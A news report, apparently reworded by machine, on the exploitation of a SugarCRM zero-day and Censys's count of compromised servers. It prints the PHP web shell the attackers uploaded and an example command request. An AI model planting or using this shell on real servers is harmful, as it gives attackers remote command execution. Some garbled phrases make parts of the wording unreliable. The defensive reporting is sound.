Over the past two weeks, hackers have exploited a critical vulnerability in the SugarCRM (customer relationship management) system to infect users with malware that gave them complete control over their servers.
The vulnerability began as a zero-day when exploit code was posted online in late December. The person who posted the exploit described it as an authentication bypass via remote code execution. This means that an attacker can use it to execute malicious code on a vulnerable server without the need for credentials. SugarCRM has since released an advisory confirming that statement. The exploit post also included various “dorks”. This is a simple web search that people can do to find vulnerable servers on the internet.
Mark Ellzey, senior security researcher at network monitoring service Censys, said in an email that as of Jan. 11, the company had detected 354 SugarCRM servers compromised using zero-days. I’m here. That’s nearly 12% of his SugarCRM servers out of a total of 3,059 Censys discovered. As of last week, the United States had the highest number of cases at 90, followed by Germany, Australia and France. In an update Tuesday, Censys said the number of infections hadn’t increased much since it was first posted.
A SugarCRM advisory published on January 5 states that a fix is now available and has already been applied to cloud-based services. We also advised users running instances outside of SugarCloud or SugarCRM managed hosting to install the hotfix. According to the advisory, this vulnerability affected Sugar Sell, Serve, Enterprise, Professional, and Ultimate software solutions. Sugar Market software was not affected.
According to Censys, authentication bypass is /index.php/ directory. “A successful authentication bypass will get a cookie from the service and send a second POST request to the path ‘/cache/images/sweet.phar’ to upload a small PNG encoded file containing PHP code. It will be executed by the server when another request is made,” the company’s researchers added.
Analyzing and decoding the binary using hexdump software roughly translates the PHP code to:
〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉
“This is a simple web shell that executes commands based on base64 encoded query argument values in ‘c’ (e.g. ‘POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==” HTTP/ 1.1”, this will run the command “/bin/id” with the same privileges as the user id running the web service),” the post explains.
A web shell provides a text-based window that an attacker can use as an interface to execute commands or code of their choice on a compromised device. Censys’ Elzey said the company doesn’t know exactly what the attackers are using the shell for.
Both Censys and SugarCRM advisories provide indicators of compromise that can be used to determine if a SugarCRM customer has been targeted. Users of vulnerable products should investigate and install the fix as soon as possible.
